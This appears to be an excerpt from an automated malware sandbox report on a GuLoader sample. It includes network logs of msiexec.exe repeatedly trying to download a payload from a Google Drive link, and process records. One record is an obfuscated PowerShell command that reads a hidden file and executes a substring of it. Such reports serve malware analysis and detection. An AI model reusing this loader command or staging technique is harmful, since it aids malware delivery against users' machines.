2025-01-11 03:36:28 UTC	418	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
2025-01-11 03:36:28 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:36:28 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-r3gyL1jruu2JlMRgJ1-plg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	51662	142.250.185.225	443	1472	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:36:29 UTC	460	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
2025-01-11 03:36:29 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQB3PWRwQj0xG4b4R_WdMa3VpXfeGxaHfHpdO6TVJB23wTKsXi4hEMZcDzAQkKT-QMOt9Tz5vk Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:36:29 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-YM2cTR2qWgT4dOSpr51Sig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:36:29 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 7a 65 79 61 45 34 51 56 56 4c 34 45 6c 52 36 45 38 75 55 45 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YzeyaE4QVVL4ElR6E8uUEw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	51663	142.250.181.238	443	1472	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:36:40 UTC	418	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
2025-01-11 03:36:41 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:36:40 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-AE1myHCXumctpA_exwdnoQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	51664	142.250.185.225	443	1472	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:36:41 UTC	460	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
2025-01-11 03:36:42 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgTxgGugA9uADex8NYgpVNhJqhaNe4icMWj4LVmTU-4F9awY1fqXY6t9-46hYRn3iohRxrAihvQ Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:36:42 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-wH5_hmduBPnj1W5p_XLs8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:36:42 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 35 4b 75 66 74 4c 45 51 71 6b 57 36 5f 30 35 6a 77 73 7a 6d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="w5KuftLEQqkW6_05jwszmg">*{margin:0;padding:0}html,code{font:15px/22px arial

Target ID:	0
Start time:	22:33:38
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\yMXFgPOdf2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\yMXFgPOdf2.exe"
Imagebase:	0x400000
File size:	554'816 bytes
MD5 hash:	54327A2F6C75BB2C549A5A98A462A588
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	22:33:38
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overstemme.SubString(72415,3);.$Epicerebral($overstemme)"
Imagebase:	0x6f0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2654376691.000000000ABA2000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	22:33:38
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	22:34:35
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0xf70000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.3919921584.0000000005692000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false